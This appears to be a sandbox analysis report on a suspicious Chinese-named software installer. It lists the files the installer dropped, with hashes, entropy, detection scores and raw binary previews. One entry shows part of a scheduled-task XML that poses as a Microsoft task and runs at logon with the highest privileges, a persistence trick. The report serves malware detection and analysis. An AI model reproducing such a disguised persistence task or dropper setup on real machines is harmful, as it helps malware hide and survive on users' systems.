                      Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):56546
                      Entropy (8bit):7.996966859255979
                      Encrypted:true
                      SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                      MD5:4CB8B7E557C80FC7B014133AB834A042
                      SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                      SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                      SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                      Malicious:false
                      Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):31890
                      Entropy (8bit):7.99402458740637
                      Encrypted:true
                      SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                      MD5:8622FC7228777F64A47BD6C61478ADD9
                      SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                      SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                      SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                      Malicious:false
                      Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):31890
                      Entropy (8bit):7.99402458740637
                      Encrypted:true
                      SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                      MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                      SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                      SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                      SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                      Malicious:false
                      Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):74960
                      Entropy (8bit):7.99759370165655
                      Encrypted:true
                      SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                      MD5:950338D50B95A25F494EE74E97B7B7A9
                      SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                      SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                      SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                      Malicious:false
                      Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):74960
                      Entropy (8bit):7.997593701656546
                      Encrypted:true
                      SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                      MD5:059BA7C31F3E227356CA5F29E4AA2508
                      SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                      SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                      SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                      Malicious:false
                      Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):29730
                      Entropy (8bit):7.994290657653607
                      Encrypted:true
                      SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                      MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                      SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                      SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                      SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                      Malicious:false
                      Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):29730
                      Entropy (8bit):7.994290657653608
                      Encrypted:true
                      SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                      MD5:A9C8A3E00692F79E1BA9693003F85D18
                      SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                      SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                      SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                      Malicious:false
                      Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:7-zip archive data, version 0.4
                      Category:dropped
                      Size (bytes):249968
                      Entropy (8bit):7.999303164107084
                      Encrypted:true
                      SSDEEP:6144:K7uc9uX4FyDbSpY3S7Z/Xjm3sGhiO1E0u72BDT0BVIe9tz:UuRX4Q+ksGrTu8DTs9tz
                      MD5:F3680A817D62E5327D9AA7F965C66559
                      SHA1:9346F4AA534F1B90E9F39AE3D945195B62DC4218
                      SHA-256:39CA13B6C0C9A99BF516874DE1665E628ACC08DB2DCB8AC3C292C72FC9640C72
                      SHA-512:B2E01984421AADB6DF32D5C3A2897A43329DC359E507372E1BC89DBC8318058804D2B3A793574A9C273857A64269538A6DA5DA4076F72E17C394DF275AA979ED
                      Malicious:false
                      Preview:7z..'...G.1\........@.......3.....|...c..&....:*Y.~..e&'~O.ye.m...@.M..9..}.....[g]..%i..#T...#.6o.f.....?O....JnqK.dtJ.4RG...X.1]D..B.._7k.P.g.b.K>.V.5.Ls.Y..I....X.....xV...;bib.'q../.J+.D...p...L..+)3...4.....N>uN...^..J$.K@jc..S....+w.?.{C.$<....Qe..g...[....H.(....p.JZ8..Mm..x.'xa.A......m..ntX.e..*.50...]z.,....K7k.<....o...0...s0.p[.....o..k%...N6.....>\.=[..M.....U.bN=.*....q..y'..q.../.G!....K.z...8.W.kS..;...T.K .3|...j.l.....W.l.).DLb...".7@..|.L,...8I.6...1....c.u..n.]#.......p.~|5.a.*.`.v..&...2).)&sa.e..A........)a%Y.....\..$.h|..:..IvXV.....?.z.[....b.ULStfm...6..........<U.wX...G....G..zk.9a.g...x.`.!...G.Y5.v..;;......P#..u...x..r.....i..W..zx..)q.R.!...?..N.go..K...@...}...".BD#..^..9.=.-.3)..#..jd...>,i....vC.BG...S......f?.....k.c.p...l.".bz.{.wm..9....|/...(.x.X..Y...X..._.....8./.U.......jk..n.....cI......b.....Z..X....*J_eRi.C...p.xN_J..;.b.t.Y*...&!...-.....KH...JK)...]'W../.:.Rv....q.sh`.T.{..Gh...j[..n...|..
                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                      File Type:PE32+ executable (native) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):63640
                      Entropy (8bit):6.482810107683822
                      Encrypted:false
                      SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                      MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                      SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                      SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                      SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 3%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:data
                      Category:dropped
                      Size (bytes):4096
                      Entropy (8bit):3.347329250663303
                      Encrypted:false
                      SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y9:dXazDlnKwhldOVQOj6dKbKsz7
                      MD5:0B22A2EDD065A1C81E971548277C256F
                      SHA1:E8C9021B2A56BD2845B2E4322A77755AE12FE197
                      SHA-256:C45C719A48CE574E67FDA9B816E972913BDCC33A5B414DFC9A31E5B55118E50B
                      SHA-512:8D36C6B062EB505CCF3B2E69307FD2526D8FD0D6DA411E8E26266ACC7DFD4B7330B01CF7161F0F8CB6B75C547A3F15525EF5DC18BB25BE34B214522D24942E95
                      Malicious:false
                      Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                      Category:dropped
                      Size (bytes):5649408
                      Entropy (8bit):6.392614480390128
                      Encrypted:false
                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3584000
                      Entropy (8bit):7.00283805408099
                      Encrypted:false
                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                      MD5:4DB75814BF4A212D3AEBA5831C059402
                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                      Malicious:false
                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:NlllulJnp/p:NllU
                      MD5:BC6DB77EB243BF62DC31267706650173
                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                      Malicious:false
                      Preview:@...e.................................X..............@..........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3366912
                      Entropy (8bit):6.530549308235048
                      Encrypted:false
                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                      MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                      SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                      SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                      SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                      Process:C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32+ executable (console) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):6144
                      Entropy (8bit):4.720366600008286
                      Encrypted:false
                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):3584000
                      Entropy (8bit):7.00283805408099
                      Encrypted:false
                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                      MD5:4DB75814BF4A212D3AEBA5831C059402
                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                      Malicious:false
